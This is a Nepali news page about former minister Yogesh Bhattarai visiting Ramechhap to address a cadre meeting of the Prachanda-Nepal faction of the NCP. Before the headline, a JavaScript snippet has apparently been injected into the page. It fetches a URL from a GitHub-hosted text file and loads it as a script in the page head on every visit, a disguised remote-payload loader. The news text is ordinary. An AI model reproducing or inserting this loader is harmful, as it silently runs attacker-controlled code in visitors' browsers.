;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); आज रामेछापमा योगेश भट्टराई आउदै – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • आज रामेछापमा योगेश भट्टराई आउदै
पत्रपत्रिका

आज रामेछापमा योगेश भट्टराई आउदै

माघ ०४,

रामेछाप । आज (आइतबार) रामेछापमा पूर्व संस्कृति, पर्यटन तथा नागरिक उड्यान मन्त्री एवं नेपाल कम्युनिष्ट पार्टी (नेकपा) प्रचण्ड-नेपाल समूहका स्थायी कमिटी सदस्य योगेश भट्टराई आउने भएका छन् ।

प्रचण्ड-नेपाल समूहको कार्यकर्ता भेलालाई सम्बोधन गर्न उनी जिल्ला आउने रामेछाप प्रचण्ड-नेपाल समूह नेकपाले जनाएको छ । आइतबार सो समूहको बृहत कार्यकर्ता भेला हुदै छ । सो भेलालाई सम्बोधन गर्न उनी जिल्ला आउन लागेका हुन् ।

भेला बिहान ११ बजे मन्थलीको जिल्ला समन्वय समितिको प्रंगाण्मा आयोजना हुने स्रोतले बताएकाको छ ।

सो समूहले जिल्लामा पार्टी फुटेपछि पहिलो पटक बृहत भेला गर्न लागेको हो  ।

प्रचण्ड-नेपाल समूहको भेला

फेसबुक प्रतिक्रियाहरु